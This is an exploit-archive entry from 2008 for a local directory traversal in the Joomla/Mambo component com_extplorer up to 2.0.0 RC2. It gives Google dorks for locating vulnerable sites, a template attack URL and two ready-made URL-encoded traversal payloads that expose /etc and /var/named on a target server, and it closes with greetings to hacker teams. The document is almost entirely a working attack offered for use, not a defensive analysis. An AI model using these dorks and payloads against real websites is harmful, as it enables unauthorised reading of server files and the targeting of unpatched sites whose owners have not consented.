[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_extplorer <= 2.0.0 RC2 Local Directory Traversal
# Published : 2008-04-13
# Author : Houssamix
# Previous Title : 1024 CMS <= 1.4.2 Local File Inclusion / Blind SQL Injection Exploit
# Next Title : Pollbooth <= 2.0 (pollID) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
= Author : HouSSaMix
= Script : Joomla and Mambo Component com_extplorer
= version : <= 2.0.0 RC2
= Download : http://joomlacode.org/gf/download/frsrelease/6717/21992/com_extplorer_2.0.0_RC2.zip
= Dork1 : inurl:index.php?option=com_extplorer
= Dork2 : powered by extplorer
= BUG : Local Directory Traversal
exploit => target.com/path/index.php?option=com_extplorer&action=show_error&dir=../../[directory]
example :
site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
= greetz : V4 Team - Jiki Team - Gold_M - HaCkeR_EgY - RoMaNcYxHaCkEr and all muslims Hackers
=================================================================================================================
# www.Syue.com [2008-04-13]